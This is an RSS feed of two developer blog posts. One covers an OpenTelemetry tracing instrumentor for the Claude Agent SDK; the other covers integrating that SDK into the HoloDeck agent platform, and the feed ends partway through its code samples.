<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Jeremiah Justin Barias</title>
    <description>The latest articles on DEV Community by Jeremiah Justin Barias (@jeremiahbarias).</description>
    <link>https://dev.to/jeremiahbarias</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3648698%2F59543698-c63b-4cb4-b342-f9924f3ae907.png</url>
      <title>DEV Community: Jeremiah Justin Barias</title>
      <link>https://dev.to/jeremiahbarias</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/jeremiahbarias"/>
    <language>en</language>
    <item>
      <title>I Built an OpenTelemetry Instrumentor for Claude Agent SDK</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Mon, 02 Mar 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/i-built-an-opentelemetry-instrumentor-for-claude-agent-sdk-4e2h</link>
      <guid>https://dev.to/jeremiahbarias/i-built-an-opentelemetry-instrumentor-for-claude-agent-sdk-4e2h</guid>
      <description>&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Background&lt;/li&gt;
&lt;li&gt;The problem&lt;/li&gt;
&lt;li&gt;What I built&lt;/li&gt;
&lt;li&gt;The hooks thing&lt;/li&gt;
&lt;li&gt;Getting started&lt;/li&gt;
&lt;li&gt;What the traces look like&lt;/li&gt;
&lt;li&gt;Rough edges and what's next&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Background
&lt;/h2&gt;

&lt;p&gt;A while back I wrote about &lt;a href="https://justinbarias.io/blog/you-dont-need-another-agent-framework/" rel="noopener noreferrer"&gt;going all-in on Claude Agent SDK for Holodeck&lt;/a&gt;. The short version: I decoupled Holodeck from Semantic Kernel through an abstraction layer, then hooked up Claude Agent SDK as a first-class backend — bash, filesystem, MCP tools, sandboxing, all native.&lt;/p&gt;

&lt;p&gt;That post was about &lt;em&gt;running&lt;/em&gt; agents. This one is about &lt;em&gt;seeing what they're doing once they run&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;With Semantic Kernel, this was a solved problem — it has native OpenTelemetry integration, so you get traces and metrics for free just by wiring up a provider. When I moved to Claude Agent SDK, that didn't exist. So I had to build it myself.&lt;/p&gt;

&lt;h2&gt;
  
  
  The problem
&lt;/h2&gt;

&lt;p&gt;I started running longer agent sessions — multi-turn research tasks, code generation workflows, that kind of thing. And pretty quickly I realized I had no idea what was happening inside them.&lt;/p&gt;

&lt;p&gt;Like, basic stuff:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;How many tokens did a 10-turn conversation actually use?&lt;/li&gt;
&lt;li&gt;Which tool calls are taking forever?&lt;/li&gt;
&lt;li&gt;Did the agent error out on turn 5 and just keep going?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I could grep through logs, sure. But I wanted real traces — the kind where you open Jaeger or Grafana and see a waterfall of what happened, with timing, with parent-child relationships between agent turns and tool calls.&lt;/p&gt;

&lt;p&gt;OpenTelemetry already has &lt;a href="https://opentelemetry.io/docs/specs/semconv/gen-ai/" rel="noopener noreferrer"&gt;GenAI semantic conventions&lt;/a&gt; for exactly this. Nobody had built an instrumentor for the Claude Agent SDK yet. So I did.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I built
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/justinbarias/opentelemetry-instrumentation-claude-agent-sdk" rel="noopener noreferrer"&gt;&lt;code&gt;opentelemetry-instrumentation-claude-agent-sdk&lt;/code&gt;&lt;/a&gt; — it's a Python package that monkey-patches &lt;code&gt;query()&lt;/code&gt; and &lt;code&gt;ClaudeSDKClient&lt;/code&gt; at runtime. Standard OTel instrumentor pattern, nothing fancy.&lt;/p&gt;

&lt;p&gt;After you call &lt;code&gt;.instrument()&lt;/code&gt;, every agent invocation gets:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An &lt;code&gt;invoke_agent&lt;/code&gt; span with model, token counts (input, output, cache hits), finish reason, conversation ID&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;execute_tool&lt;/code&gt; child spans for each tool call — Bash, Read, Write, MCP tools, whatever&lt;/li&gt;
&lt;li&gt;Histograms for token usage and operation duration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It follows the GenAI semconv spec, so these traces look like any other LLM provider in your existing dashboards. That was important to me — I didn't want to invent custom attributes that only work with Claude.&lt;/p&gt;
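&lt;p&gt;To make that concrete, here's a rough sketch of the attributes an &lt;code&gt;invoke_agent&lt;/code&gt; span carries. The attribute names come from the GenAI semconv spec; the values (and the helper itself) are illustrative, not the instrumentor's actual code:&lt;/p&gt;

```python
# Sketch: GenAI semantic-convention attributes on an invoke_agent span.
# Attribute names follow the OTel GenAI spec; the values are made up.
def invoke_agent_attributes(model, input_tokens, output_tokens, conversation_id):
    return {
        "gen_ai.operation.name": "invoke_agent",
        "gen_ai.request.model": model,
        "gen_ai.usage.input_tokens": input_tokens,
        "gen_ai.usage.output_tokens": output_tokens,
        "gen_ai.conversation.id": conversation_id,
    }

attrs = invoke_agent_attributes("claude-sonnet-4-5", 1847, 423, "sess-42")
print(attrs["gen_ai.operation.name"])
```

&lt;p&gt;Because these are standard names, a dashboard that already groups LLM traffic by &lt;code&gt;gen_ai.request.model&lt;/code&gt; picks these spans up with no extra work.&lt;/p&gt;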

&lt;p&gt;It only depends on &lt;code&gt;opentelemetry-api&lt;/code&gt; and &lt;code&gt;wrapt&lt;/code&gt; at runtime (not the SDK), so if you don't configure a &lt;code&gt;TracerProvider&lt;/code&gt;, the overhead is effectively zero — the OTel no-op path handles it.&lt;/p&gt;

&lt;p&gt;Here's what &lt;code&gt;.instrument()&lt;/code&gt; actually does under the hood:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────┐
│ ClaudeAgentSdkInstrumentor.instrument() │
└─────────────────────────────────────────┘
                         │
                         ▼
  Monkey-patches 4 SDK methods via wrapt:

  query()                            -&amp;gt; _wrap_query
  ClaudeSDKClient.__init__()         -&amp;gt; _wrap_client_init
  ClaudeSDKClient.query()            -&amp;gt; _wrap_client_query
  ClaudeSDKClient.receive_response() -&amp;gt; _wrap_client_receive_response

                         │
                         ▼
  At call time, wrappers do:

  _wrap_query (standalone path):
    1. inject hooks into options
    2. create invoke_agent span
    3. set InvocationContext
    4. async iterate wrapped()
       - intercept AssistantMessage
       - intercept ResultMessage
    5. record metrics, end span

  _wrap_client_init:
    1. call original __init__()
    2. inject hooks into options
    3. store OTel config on instance

  _wrap_client_query + _wrap_client_receive_response:
    1. query(): create span, set context
    2. receive_response(): async iterate
       - intercept AssistantMessage
       - intercept ResultMessage
    3. record metrics, end span

  │
  ▼
  All paths inject hooks into options (via merge_hooks):

  PreToolUse         -&amp;gt; open execute_tool span
  PostToolUse        -&amp;gt; close span (success)
  PostToolUseFailure -&amp;gt; close span (error)
  SubagentStart      -&amp;gt; (future: subagent span)
  SubagentStop       -&amp;gt; (future: close span)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The hooks thing
&lt;/h2&gt;

&lt;p&gt;This is the part I'm actually proud of.&lt;/p&gt;

&lt;p&gt;The Claude Agent SDK has a hook system — &lt;code&gt;PreToolUse&lt;/code&gt;, &lt;code&gt;PostToolUse&lt;/code&gt;, &lt;code&gt;PostToolUseFailure&lt;/code&gt;, etc. Most people probably ignore them. But they're perfect for instrumentation.&lt;/p&gt;

&lt;p&gt;The naive approach would be to parse tool calls out of the response stream after they finish. That works, but you lose accurate timing, and you can't catch failures cleanly.&lt;/p&gt;

&lt;p&gt;Instead, I register hook callbacks. When a tool starts, &lt;code&gt;PreToolUse&lt;/code&gt; fires and I open a span. When it finishes, &lt;code&gt;PostToolUse&lt;/code&gt; closes it. If it crashes, &lt;code&gt;PostToolUseFailure&lt;/code&gt; closes it with an error. Simple.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;PreToolUse("Bash", tool_use_id="xyz") -&amp;gt; span starts
  ... tool runs ...
PostToolUse("Bash", tool_use_id="xyz") -&amp;gt; span ends

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;tool_use_id&lt;/code&gt; lets me correlate start and end events even when multiple tools run concurrently. And the hooks are merged &lt;em&gt;after&lt;/em&gt; any hooks you've already set up, so the instrumentation stays out of your way.&lt;/p&gt;
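&lt;p&gt;Here's a minimal sketch of that correlation logic — a dict of open spans keyed by &lt;code&gt;tool_use_id&lt;/code&gt;, with plain dicts standing in for real OTel spans:&lt;/p&gt;

```python
import time

# Stand-in for the instrumentor's span bookkeeping: plain dicts instead
# of real OTel spans, keyed by tool_use_id so overlapping calls stay apart.
open_spans = {}

def on_pre_tool_use(tool_name, tool_use_id):
    # PreToolUse fires: open a "span" for this specific tool invocation.
    open_spans[tool_use_id] = {"tool": tool_name, "start": time.monotonic()}

def on_post_tool_use(tool_use_id, error=None):
    # PostToolUse / PostToolUseFailure fires: close the matching span.
    span = open_spans.pop(tool_use_id)
    span["duration"] = time.monotonic() - span["start"]
    span["status"] = "error" if error else "ok"
    return span

on_pre_tool_use("Bash", "toolu_01")
on_pre_tool_use("Read", "toolu_02")   # second tool overlaps the first
done = on_post_tool_use("toolu_01")   # closes only the Bash span
print(done["tool"], done["status"])
```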

&lt;p&gt;You can also opt into capturing tool arguments and results with &lt;code&gt;capture_content=True&lt;/code&gt;. It's off by default because you probably don't want prompt contents showing up in your trace backend.&lt;/p&gt;

&lt;h2&gt;
  
  
  Getting started
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install opentelemetry-instrumentation-claude-agent-sdk[instruments]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Minimal setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import SimpleSpanProcessor, ConsoleSpanExporter
from opentelemetry.instrumentation.claude_agent_sdk import ClaudeAgentSdkInstrumentor

provider = TracerProvider()
provider.add_span_processor(SimpleSpanProcessor(ConsoleSpanExporter()))

ClaudeAgentSdkInstrumentor().instrument(tracer_provider=provider)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or if you use &lt;code&gt;opentelemetry-instrument&lt;/code&gt; for auto-instrumentation, it just picks it up — the instrumentor is registered as an entry point.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;opentelemetry-instrument python my_agent_app.py

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two lines if you already have a global &lt;code&gt;TracerProvider&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from opentelemetry.instrumentation.claude_agent_sdk import ClaudeAgentSdkInstrumentor
ClaudeAgentSdkInstrumentor().instrument()

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  What the traces look like
&lt;/h2&gt;

&lt;p&gt;Here's roughly what a multi-turn session looks like in your trace viewer:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;invoke_agent [3.2s, 1847 in / 423 out tokens]
├── execute_tool "Bash" [0.8s]
├── execute_tool "Read" [0.1s]
└── execute_tool "mcp__github" [1.4s, type=extension]

invoke_agent [1.1s, 2103 in / 187 out tokens]
└── execute_tool "Write" [0.05s]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Both &lt;code&gt;invoke_agent&lt;/code&gt; spans share the same &lt;code&gt;gen_ai.conversation.id&lt;/code&gt;, so you can track a whole session. MCP tools get tagged as &lt;code&gt;type=extension&lt;/code&gt;, built-in ones as &lt;code&gt;type=function&lt;/code&gt; — handy if you want to see how much time your agent spends in external tools vs native ones.&lt;/p&gt;
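&lt;p&gt;That split makes simple aggregations easy once the spans are exported. A sketch, with plain dicts standing in for exported spans (durations taken from the example trace above):&lt;/p&gt;

```python
# Sketch: sum execute_tool durations by tool type
# (type=extension for MCP tools, type=function for built-ins).
spans = [
    {"name": "Bash", "type": "function", "duration_s": 0.8},
    {"name": "Read", "type": "function", "duration_s": 0.1},
    {"name": "mcp__github", "type": "extension", "duration_s": 1.4},
    {"name": "Write", "type": "function", "duration_s": 0.05},
]

totals = {}
for s in spans:
    totals[s["type"]] = totals.get(s["type"], 0.0) + s["duration_s"]

print(totals)
```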

&lt;p&gt;Here's the &lt;code&gt;invoke_agent&lt;/code&gt; span in the Aspire dashboard — you can see token counts, model, finish reason, and conversation ID all as span attributes:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzo24pc0aihf39ts2l88.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzo24pc0aihf39ts2l88.png" alt=" " width="800" height="272"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And drilling into an &lt;code&gt;execute_tool&lt;/code&gt; child span, you get the tool name, type, and the MCP tool path:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpjjgb0nqdfms3ewhdy5u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpjjgb0nqdfms3ewhdy5u.png" alt=" " width="800" height="282"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Rough edges and what's next
&lt;/h2&gt;

&lt;p&gt;This is alpha. It works, I'm using it, but there's stuff I haven't gotten to yet:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Subagent tracking&lt;/strong&gt; — the hooks are wired for &lt;code&gt;SubagentStart&lt;/code&gt;/&lt;code&gt;SubagentStop&lt;/code&gt; but I haven't built the spans yet&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Content capture on agent spans&lt;/strong&gt; — right now &lt;code&gt;capture_content&lt;/code&gt; only covers tool args/results, not the full prompt/response&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It's &lt;a href="https://github.com/justinbarias/opentelemetry-instrumentation-claude-agent-sdk" rel="noopener noreferrer"&gt;MIT-licensed on GitHub&lt;/a&gt;. If you're running Claude agents and want to actually see what they're doing, try it out. If something's broken, &lt;a href="https://github.com/justinbarias/opentelemetry-instrumentation-claude-agent-sdk/issues" rel="noopener noreferrer"&gt;file an issue&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Previously: &lt;a href="https://justinbarias.io/blog/you-dont-need-another-agent-framework/" rel="noopener noreferrer"&gt;"You Don't Need Any Other Agent Framework"&lt;/a&gt; — where I talked about decoupling Holodeck from Semantic Kernel and hooking up Claude Agent SDK as a first-class backend.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agents</category>
      <category>llm</category>
      <category>monitoring</category>
      <category>showdev</category>
    </item>
    <item>
      <title>You Don't Need Any Other Agent Framework, You Only Need Claude Agents SDK</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Wed, 25 Feb 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/you-dont-need-any-other-agent-framework-you-only-need-claude-agents-sdk-46n5</link>
      <guid>https://dev.to/jeremiahbarias/you-dont-need-any-other-agent-framework-you-only-need-claude-agents-sdk-46n5</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo6r9hx1mglkeaoykjnsg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo6r9hx1mglkeaoykjnsg.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I've spent months building &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt; — a no-code agent platform where you define agents, tools, evaluations, and deployments in pure YAML. It supports OpenAI, Azure, and Ollama via Semantic Kernel. And as of v0.5.0, it supports Claude Agents SDK as a &lt;strong&gt;first-class backend&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Now, here's a hot take: after building both backends side by side, I'm convinced Claude Agents SDK is the only agent framework most developers actually need.&lt;/p&gt;

&lt;p&gt;If you read my &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;previous post on bash/filesystem-based agentic systems&lt;/a&gt;, you already know I'm a fan of agents that work &lt;em&gt;with&lt;/em&gt; your tools, not agents that try to &lt;em&gt;replace&lt;/em&gt; them. Claude Agents SDK nails this. It gives you a process with bash, file I/O, MCP tool access, extended thinking, and structured output — out of the box.&lt;/p&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Why Claude Agents SDK&lt;/li&gt;
&lt;li&gt;How HoloDeck Runs Claude Under the Hood&lt;/li&gt;
&lt;li&gt;The Bridges and Adapters I Built&lt;/li&gt;
&lt;li&gt;Custom Tools Are Just MCP Servers&lt;/li&gt;
&lt;li&gt;What's Supported Today&lt;/li&gt;
&lt;li&gt;Security: Sandboxing and Secure Deployment&lt;/li&gt;
&lt;li&gt;Using Claude Agents SDK Without an Anthropic API Key&lt;/li&gt;
&lt;li&gt;Auth: Local Experimentation vs Production&lt;/li&gt;
&lt;li&gt;What's Coming Next&lt;/li&gt;
&lt;li&gt;Wrapping Up&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Why Claude Agents SDK
&lt;/h2&gt;

&lt;p&gt;Most agent frameworks give you a library. You import classes, wire up chains, manage state, and pray that your tool-calling loop doesn't hit an edge case.&lt;/p&gt;

&lt;p&gt;Claude Agents SDK gives you a &lt;strong&gt;process&lt;/strong&gt;. An actual subprocess that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Has bash access (configurable, with excluded commands)&lt;/li&gt;
&lt;li&gt;Can read, write, and edit files&lt;/li&gt;
&lt;li&gt;Runs MCP tools natively&lt;/li&gt;
&lt;li&gt;Supports extended thinking (deep reasoning with token budgets)&lt;/li&gt;
&lt;li&gt;Returns structured output validated against JSON schemas&lt;/li&gt;
&lt;li&gt;Manages multi-turn sessions with conversation continuity&lt;/li&gt;
&lt;li&gt;Supports subagents for parallel task execution&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't "here's an LLM wrapper with tool use." This is "here's an autonomous coding agent you can point at any problem." The same engine that powers Claude Code, now available as an SDK.&lt;/p&gt;

&lt;p&gt;In my &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;previous post&lt;/a&gt;, I talked about how bash + filesystem is the real agentic memory layer — not some vector database, not some custom state manager. Claude Agents SDK is the natural evolution of that idea. The agent &lt;em&gt;is&lt;/em&gt; a process. Its memory &lt;em&gt;is&lt;/em&gt; the filesystem. Its tools &lt;em&gt;are&lt;/em&gt; MCP servers.&lt;/p&gt;




&lt;h2&gt;
  
  
  How HoloDeck Runs Claude Under the Hood
&lt;/h2&gt;

&lt;p&gt;HoloDeck doesn't wrap Claude in some brittle API adapter. It spawns the Claude Agent SDK as a &lt;strong&gt;separate Node.js subprocess&lt;/strong&gt;, then communicates via a structured message protocol. Think of it like running a very smart CLI tool — you send a prompt in, you get structured messages back.&lt;/p&gt;

&lt;p&gt;Here's the architecture:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──────────────────────────────────────────────────────────────────┐
│                    HoloDeck (Python process)                     │
│                                                                  │
│ ┌───────────────┐  ┌───────────────┐  ┌─────────────────────┐    │
│ │ holodeck test │  │ holodeck chat │  │ holodeck serve (SK) │    │
│ │  (TestExec)   │  │  (ChatSess)   │  │   (future Claude)   │    │
│ └───────────────┘  └───────────────┘  └─────────────────────┘    │
│        │                │                                        │
│        ▼                ▼                                        │
│ ┌─────────────────────────────────────────────────────┐          │
│ │                   BackendSelector                   │          │
│ │ provider: anthropic ────────────────► ClaudeBackend │          │
│ │ provider: openai / azure / ollama ──► SKBackend     │          │
│ └─────────────────────────────────────────────────────┘          │
│                         │                                        │
│                         ▼                                        │
│ ┌──────────────────────────────────────────────────────────────┐ │
│ │                   ClaudeBackend                              │ │
│ │                                                              │ │
│ │ ┌───────────────┐  ┌─────────────┐  ┌──────────────────────┐ │ │
│ │ │ Tool Adapters │  │ MCP Bridge  │  │    OTel Bridge       │ │ │
│ │ │ (in-process   │  │ (external   │  │ (env var translator) │ │ │
│ │ │  MCP server)  │  │  MCP stdio) │  │                      │ │ │
│ │ └───────────────┘  └─────────────┘  └──────────────────────┘ │ │
│ │        │                │                                    │ │
│ │        ▼                ▼                                    │ │
│ │ ┌────────────────────────────────────────────────────┐       │ │
│ │ │ ClaudeAgentOptions                                 │       │ │
│ │ │ {model, system_prompt, mcp_servers, env,           │       │ │
│ │ │  permission_mode, max_turns, allowed_tools, ...}   │       │ │
│ │ └────────────────────────────────────────────────────┘       │ │
│ └──────────────────────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────────────────────┘
                              │
           stdin: AsyncGenerator[prompt]
           stdout: AssistantMessage | UserMessage | ResultMessage
                              │
                              ▼
┌────────────────────────────────────────────────────────┐
│        Claude Agent SDK (Node.js subprocess)           │
│                                                        │
│ ┌────────────────────────────────────────────────────┐ │
│ │ Claude Model (sonnet, opus, haiku, etc.)           │ │
│ │                                                    │ │
│ │ Tools:                                             │ │
│ │  ├── holodeck_tools (in-process MCP server)        │ │
│ │  │    ├── vectorstore_search                       │ │
│ │  │    └── hierarchical_doc_search                  │ │
│ │  ├── external MCP servers (stdio transport)        │ │
│ │  ├── bash (configurable, with excluded commands)   │ │
│ │  ├── file read/write/edit (toggleable)             │ │
│ │  └── web search (optional)                         │ │
│ └────────────────────────────────────────────────────┘ │
└────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key insight: &lt;strong&gt;the Claude subprocess manages its own tool loop&lt;/strong&gt;. HoloDeck doesn't manually orchestrate "call LLM → parse tool call → execute tool → feed result back." The SDK does all of that internally. HoloDeck's job is to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Assemble the right configuration (tools, auth, observability, system prompt)&lt;/li&gt;
&lt;li&gt;Send the prompt in&lt;/li&gt;
&lt;li&gt;Collect the structured results coming back&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is fundamentally simpler than the Semantic Kernel path where you have to manage &lt;code&gt;ChatHistory&lt;/code&gt;, tool plugins, function call routing, and all the plumbing yourself.&lt;/p&gt;
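&lt;p&gt;The routing itself is the boring part. Here's a sketch of what &lt;code&gt;BackendSelector&lt;/code&gt; amounts to — the class names mirror the diagram, but the bodies are stubs, not HoloDeck's actual code:&lt;/p&gt;

```python
# Sketch of the provider routing from the architecture diagram.
# ClaudeBackend / SKBackend are stand-in stubs, not the real classes.
class ClaudeBackend: ...
class SKBackend: ...

SK_PROVIDERS = {"openai", "azure", "ollama"}

def select_backend(provider: str):
    if provider == "anthropic":
        return ClaudeBackend()       # Claude Agent SDK subprocess path
    if provider in SK_PROVIDERS:
        return SKBackend()           # Semantic Kernel path
    raise ValueError(f"unknown provider: {provider}")

print(type(select_backend("anthropic")).__name__)
```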




&lt;h2&gt;
  
  
  The Bridges and Adapters I Built
&lt;/h2&gt;

&lt;p&gt;To make HoloDeck's existing tools and infrastructure work seamlessly with Claude Agents SDK, I built three bridge layers.&lt;/p&gt;

&lt;h3&gt;
  
  
  Tool Adapters (&lt;code&gt;tool_adapters.py&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;HoloDeck has rich tool implementations — &lt;code&gt;VectorStoreTool&lt;/code&gt; for semantic search, &lt;code&gt;HierarchicalDocumentTool&lt;/code&gt; for structure-aware document retrieval with contextual embeddings, hierarchy tracking, and hybrid search. These are Python objects with initialized connections to vector databases, embedding models, and keyword indexes.&lt;/p&gt;

&lt;p&gt;The tool adapters wrap these live Python tool instances as an &lt;strong&gt;in-process MCP server&lt;/strong&gt; that the Claude subprocess can invoke. Each adapter creates &lt;code&gt;@tool&lt;/code&gt;-decorated handler functions with proper JSON schemas, then bundles them into a &lt;code&gt;McpSdkServerConfig&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;VectorStoreTool (Python, initialized with vector DB connection)
        │
        ▼
VectorStoreToolAdapter.to_sdk_tool()
        │
        ▼
@tool("vectorstore_search", schema={...})
async def search(query: str, top_k: int) -&amp;gt; str:
    return await tool_instance.search(query, top_k)
        │
        ▼
build_holodeck_sdk_server()
        │
        ▼
McpSdkServerConfig(name="holodeck_tools", tools=[...])
        │
        ▼
Registered as mcp_servers["holodeck_tools"] in ClaudeAgentOptions

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One subtle but critical detail I had to figure out: the prompt must be sent as an &lt;code&gt;AsyncGenerator&lt;/code&gt; — not a plain string — to keep stdin open for bidirectional MCP communication. A string prompt closes stdin immediately, which kills the in-process MCP server's ability to respond. I learned this the hard way after debugging a &lt;code&gt;ProcessTransport&lt;/code&gt; error for way too long.&lt;/p&gt;
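&lt;p&gt;The fix looks roughly like this. It's a sketch of the pattern only — the exact streaming message shape is the SDK's to define, so check its docs before copying:&lt;/p&gt;

```python
import asyncio

# Passing the prompt as an async generator (not a plain string) keeps
# stdin open for bidirectional MCP traffic. The message shape below is
# illustrative, not the SDK's guaranteed format.
async def prompt_stream(text):
    yield {"type": "user", "message": {"role": "user", "content": text}}

async def main():
    # In real code this generator is handed to the SDK's query(prompt=...);
    # here we just drain it to show the shape.
    return [m async for m in prompt_stream("summarize README.md")]

messages = asyncio.run(main())
print(messages[0]["message"]["content"])
```

&lt;p&gt;Handing the generator to the SDK instead of a bare string is the whole trick — the process keeps stdin open while messages can still arrive.&lt;/p&gt;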

&lt;h3&gt;
  
  
  MCP Bridge (&lt;code&gt;mcp_bridge.py&lt;/code&gt;)
&lt;/h3&gt;

&lt;p&gt;HoloDeck users configure external MCP tools in YAML — database servers, API connectors, custom tooling, whatever. The MCP bridge translates HoloDeck's &lt;code&gt;MCPTool&lt;/code&gt; config format into the &lt;code&gt;McpStdioServerConfig&lt;/code&gt; TypedDicts that Claude Agents SDK expects.&lt;/p&gt;

&lt;p&gt;It handles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Three-level env var resolution:&lt;/strong&gt; process env → &lt;code&gt;.env&lt;/code&gt; file → explicit YAML overrides&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;${VAR}&lt;/code&gt; substitution&lt;/strong&gt; in config values&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;JSON config blobs&lt;/strong&gt; serialized into &lt;code&gt;MCP_CONFIG&lt;/code&gt; env var for complex tool configuration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Transport filtering&lt;/strong&gt; — Claude subprocess only supports stdio, so SSE/WebSocket/HTTP tools are skipped with a warning&lt;/li&gt;
&lt;/ul&gt;
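&lt;p&gt;The resolution order is the easy thing to get wrong, so here's a sketch of it. Function names are hypothetical, and the assumption is that each later level wins — YAML overrides beat &lt;code&gt;.env&lt;/code&gt;, which beats the process environment:&lt;/p&gt;

```python
import os
import string

# Sketch of three-level env resolution (hypothetical function names).
# Assumption: later levels win: process env, then .env, then YAML overrides.
def resolve_env(dotenv: dict, yaml_overrides: dict) -> dict:
    merged = dict(os.environ)
    merged.update(dotenv)            # .env file beats process env
    merged.update(yaml_overrides)    # explicit YAML overrides beat both
    return merged

def substitute(value: str, env: dict) -> str:
    # ${VAR} substitution in config values, leaving unknown vars alone.
    return string.Template(value).safe_substitute(env)

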